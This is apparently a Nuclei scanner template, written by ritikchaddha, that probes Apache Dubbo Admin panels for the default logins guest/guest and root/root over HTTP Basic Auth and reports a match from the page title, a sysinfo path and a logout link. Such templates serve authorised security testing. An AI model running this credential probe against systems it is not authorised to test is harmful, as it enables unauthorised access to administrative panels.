id: dubbo-admin-default-login

info:
  name: Dubbo Admin Default Login
  author: ritikchaddha
  severity: high
  reference:
    - https://www.cnblogs.com/wishwzp/p/9438658.html
  tags: dubbo,apache,default-login

requests:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Authorization: Basic {{base64(username + ':' + password)}}

    attack: pitchfork
    payloads:
      username:
        - guest
        - root
      password:
        - guest
        - root

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "<title>Dubbo Admin</title>"
          - "/sysinfo/versions"
          - "{{username}}', '/logout')"
        condition: and

      - type: status
        status:
          - 200
